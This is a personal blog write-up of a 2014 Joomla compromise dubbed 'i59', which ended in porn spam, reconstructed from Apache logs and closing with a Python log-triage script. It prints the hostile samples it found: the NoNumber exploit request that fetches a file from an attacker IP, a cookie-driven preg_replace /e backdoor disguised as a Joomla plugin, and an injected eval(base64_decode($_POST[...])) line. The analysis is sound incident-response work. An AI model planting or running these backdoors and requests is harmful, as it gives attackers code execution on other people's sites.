Yinette's Webshite

A collection of security stuff and all sorts of other random shit.

I59

i59 – a story of spammers, pornography, and really old joomla exploits

Last year there was a similar campaign, also using Joomla and WordPress sites to send spam. It was officially known as "Rodecap"; you can find a good write-up on it here: http://www.abuse.ch/?tag=rodecap What made it unusual was that the IPs hitting the malicious PHP script were in fact infected Windows boxes. This one, which I'm calling i59 (due to the absence of any other name), appears to be the replacement for our old friend Rodecap. It's called i59 due to the extensive use of the $i59 variable within the script.

This was mostly uncovered using log diving, grep, and a shitload of caffeine.

Please note the filenames here are what I discovered in this particular instance of an i59 infection. It seems each case has a different place where things are stored, named, etc.

Anything I've got wrong, please let me know! I've had very ample time to properly look into this…

The story begins, initial vector

It appears that this all started around the 24th/25th of May 2014. The exploit in question is this one: http://www.exploit-db.com/exploits/17995/ – from my research, it looks like this has already been patched by the NoNumber developer.

188.208.33.18 - - [24/May/2014:03:25:01 +1000] "POST /index.php?nn_qp=1&url=http://5.34.177.110/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:04 +1000] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:06 +1000] "POST /components/a.php HTTP/1.1" 200 143 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"
188.208.33.18 - - [24/May/2014:03:25:08 +1000] "GET /components/4idf49.php HTTP/1.1" 200 62084 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"

The IP 5.34.177.110 doesn't respond to anything at the moment; either it was withdrawn or destroyed. The IP belongs to a hosting mob from Ukraine, to be specific the town of Kharkiv. This looks as if it would have hosted the remote shell, however without the full POST data I cannot tell for sure.

Secondly, our first actor, 188.208.33.18 from Romania, is always the IP that injects and establishes the foothold on the Joomla site it has infected.

The first thing it puts on the site is a basic PHP script that can be used to gather some information:

md5: 305038e2f82471a683ccdd71078a02d9

# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

5.34.177.110    FALSE   /about/ FALSE   0       <?eval(stripslashes(array_pop($_POST)))>       1

Seems to also carry some meta-data.

From there it will have already uploaded the next stage:

md5: ad354405da14c4cdc5957cc84bc2ee49

<?php
/**
 * @package     Joomla.Plugin.System
 * @since       1.5
 */
class PlgSysJoomla {
    public function __construct() {
        // Function name supplied by cookie Jlma3, used to decode the other two cookies
        $file = @$_COOKIE['Jlma3'];
        if ($file) {
            $opt = $file(@$_COOKIE['Jlma2']);   // decodes to a second function name
            $au  = $file(@$_COOKIE['Jlma1']);   // decodes to the attacker-supplied PHP
            $opt("/292/e", $au, 292);           // presumably preg_replace; /e evaluates $au as PHP
            die();
        } else {
            phpinfo();                          // no cookies: just dump the server config
            die;
        }
    }
}

Sneaky fecker pretends to be a part of Joomla. Romania's role here is just to make sure it returns the phpinfo…

About a week later, Romania comes back and throws some stuff at our fake Joomla component:

188.208.33.18 - - [06/Jul/2014:21:45:47 +1000] "POST /components/4idf49.php HTTP/1.1" 200 70 "http://www.google.com" "Mozilla/7.0 (Windows XP 6.1; rv:12.1) Gecko/2014 Firefox/11.1"

This is where the next file is born…

md5sum: 7fdd8a13ae5c0a3ee2713e8c3ddf39d4

Look at the attached file ‘395adn.php’

I haven’t had time to properly dissect this, but I’m sure someone out there would like to. Mostly from inference, guessing and experience, this appears to be a webshell and a file uploader.

From here there is a bit of silence. It's possible that this was just the foothold that would be sold on to whoever wanted a lot of Joomla sites to do naughty things with… Might be interesting to see what sort of chatter was going on in the Russian cybercrime forums around this time.

So a month later, we meet a new actor:

37.139.47.122 - - [07/Jul/2014:22:06:04 +1000] "GET /components/com_podcastmedia/395adn.php HTTP/1.1" 200 106 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:06 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 2214 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:09 +1000] "POST /components/com_podcastmedia/395adn.php HTTP/1.1" 200 3360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

Our friend 37.139.47.122 is from St. Petersburg, Russia.

He immediately uploads his backdoors, as well as spreading a whole bunch of shit around. I like to call this the 'arse spraying mayhem'.

37.139.47.122 - - [07/Jul/2014:22:06:23 +1000] "POST /libraries/getid3/module.audio.bonk.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:27 +1000] "POST /modules/mod_banners/mod_banners.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:41 +1000] "POST /modules/mod_articles_archive/mod_articles_archive.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:54 +1000] "POST /components/com_banners/models/search.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:56 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:06:58 +1000] "POST /libraries/cms/view/db.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:00 +1000] "POST /components/com_sh404sef/system.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:02 +1000] "POST /media/mediaelements/js/list.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:04 +1000] "POST /libraries/joomla/installer/ajax.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:06 +1000] "POST /media/editors/codemirror/object.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:08 +1000] "POST /components/com_k2/controllers/title.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:10 +1000] "POST /modules/mod_feed/tmpl/help.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:12 +1000] "POST /components/com_mailto/helpers/alias.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:14 +1000] "POST /components/com_content/controllers/sql.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:16 +1000] "POST /plugins/search/contacts/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:18 +1000] "POST /media/system/css/proxy.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:20 +1000] "POST /components/com_jce/options.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:23 +1000] "POST /modules/mod_footer/tmpl/gallery.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:25 +1000] "POST /templates/view.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:27 +1000] "POST /components/com_mailto/themes.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:31 +1000] "POST /logs/menu.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
37.139.47.122 - - [07/Jul/2014:22:07:33 +1000] "POST /libraries/phputf8/utils/page.php HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

The POSTs are to confirm everything is there and working.

This basically puts the following into a bunch of new files, as well as into the top of some already existing files:

eval(base64_decode($_POST['ne0080b']));

This effectively gives the bot leverage to execute arbitrary PHP from any of its several 'mini backdoors'.

This IP will also be responsible for maintaining the bot, and making sure that it can still get in.

I’ve also observed this thing messing with file modification times, so it was kinda tricky to properly link this all together.

A few days pass…

37.139.47.243 - - [11/Jul/2014:06:45:48 +1000] "POST /libraries/fof/toolbar/sql.php HTTP/1.1" 200 185 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"

This is where the star of the show is born… i59!

md5sum: 71a7c769e644d8cf3cf32419239212c7

Again, i59 is something I haven't had the time to properly dissect. Even though it is the star of the show, it's kept me busier trying to track its ass down and stop the machine it has infected from being RBL'd for trying to spam porno links to everyone on AOL and Yahoo.

But this is the component that sends the spam, as is evident in the following log snippet:

66.33.212.107 - - [25/Jul/2014:02:53:20 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:58:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2558 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2577 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
210.48.148.152 - - [25/Jul/2014:02:59:43 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:30 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.89.31.184 - - [25/Jul/2014:03:08:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
91.121.12.223 - - [25/Jul/2014:03:09:48 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:38 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5164 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4871 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:10:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4667 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 5132 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.150 - - [25/Jul/2014:03:11:16 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
74.220.219.67 - - [25/Jul/2014:03:13:10 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.56.213 - - [25/Jul/2014:03:14:51 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:37 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1058 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
77.222.61.243 - - [25/Jul/2014:03:16:49 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3203 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.240 - - [25/Jul/2014:03:19:47 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:22 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3457 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3188 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:42 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3683 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:21:54 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3975 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:08 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.217.112.247 - - [25/Jul/2014:03:22:17 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.153 - - [25/Jul/2014:03:24:02 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2302 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3912 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:29:44 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2899 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
92.53.106.199 - - [25/Jul/2014:03:30:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3394 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:19 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2509 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
69.16.199.30 - - [25/Jul/2014:03:35:27 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
199.168.99.123 - - [25/Jul/2014:03:36:12 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
141.105.121.139 - - [25/Jul/2014:03:41:00 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:32 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3196 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
66.147.244.245 - - [25/Jul/2014:03:42:45 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:24 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:46:34 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 3894 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:13 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2186 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 1673 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:47:50 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2219 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:01 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2142 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
192.145.239.8 - - [25/Jul/2014:03:48:31 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"

Why some of these are getting 500s, I'm not sure… It could be the server's load or a problem in the i59 script itself… Either way it was filling up the mail queue with annoying filth.

UPDATE: The 500s seem to be caused by me setting restrictive facls on the postfix binary, lol!

[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied
[Fri Jul 25 04:13:09 2014] [error] [client 184.107.157.218] sh: /usr/sbin/sendmail: Permission denied

Trololololololololol

All communications of i59 are done with the same User-Agent: "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
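Since every i59 request carries that User-Agent, here is an added triage script (my code, not from the post) that runs the indicators from this write-up over Apache combined-format log lines: the exact i59 UA, the nn_qp=1&url= vector from the first log block, and POSTs aimed straight at a .php file other than index.php. The "direct PHP POST" heuristic is my assumption about stock Joomla, and the 10.0.0.5 line is a made-up clean request.

```python
"""Triage Apache combined-format log lines for the i59 indicators described in this write-up."""
import re

LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Exact User-Agent carried by every i59 request (quoted in the post).
I59_UA = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
# nn_qp=1&url=http://... is the NoNumber vector from the very first log block.
NN_QP_RX = re.compile(r"[?&]nn_qp=1&url=https?://", re.I)
# Heuristic (my assumption, not from the post): stock Joomla routes POSTs via index.php,
# so a POST aimed straight at any other .php file deserves a look.
DIRECT_PHP_RX = re.compile(
    r"^/(?!index\.php|administrator/index\.php)(?:.*/)?[^/?]+\.php(?:\?|$)")

def classify(line):
    """Return the indicator tags for one log line: [] if none fired, None if unparseable."""
    m = LOG_RX.match(line.strip())
    if not m:
        return None
    tags = []
    if m["ua"] == I59_UA:
        tags.append("i59_user_agent")
    if NN_QP_RX.search(m["path"]):
        tags.append("nn_qp_remote_fetch")
    if m["method"] == "POST" and DIRECT_PHP_RX.match(m["path"]):
        tags.append("post_to_direct_php")
    return tags

def triage(lines):
    """Group flagged lines by source IP: {ip: {"tags": set, "hits": n, "errors": n}}."""
    report = {}
    for line in lines:
        tags = classify(line)
        if not tags:
            continue
        m = LOG_RX.match(line.strip())
        entry = report.setdefault(m["ip"], {"tags": set(), "hits": 0, "errors": 0})
        entry["tags"].update(tags)
        entry["hits"] += 1
        if m["status"].startswith("5"):  # the 500s the post traces to the sendmail facl
            entry["errors"] += 1
    return report

# Constructed sample lines, modelled on the ones quoted in the post; 10.0.0.5 is made up.
SAMPLE_LOG = [
    '188.208.33.18 - - [24/May/2014:03:25:01 +1000] "POST /index.php?nn_qp=1&url=http://5.34.177.110/about/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"',
    '188.208.33.18 - - [24/May/2014:03:25:06 +1000] "POST /components/a.php HTTP/1.1" 200 143 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0"',
    '210.48.148.152 - - [25/Jul/2014:02:58:57 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 200 2528 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"',
    '210.48.148.152 - - [25/Jul/2014:02:59:43 +1000] "POST /media/mod_languages/list.php HTTP/1.1" 500 1062 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"',
    '10.0.0.5 - - [25/Jul/2014:03:00:00 +1000] "GET /index.php?option=com_content HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    print(triage(SAMPLE_LOG))
```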

This is where I draw the parallel to Rodecap. I'm unsure what these IPs are, whether they're compromised machines or what. But they supply the spam in encrypted payloads.

balls… will have to find a format that gist doesn’t shit its pants over…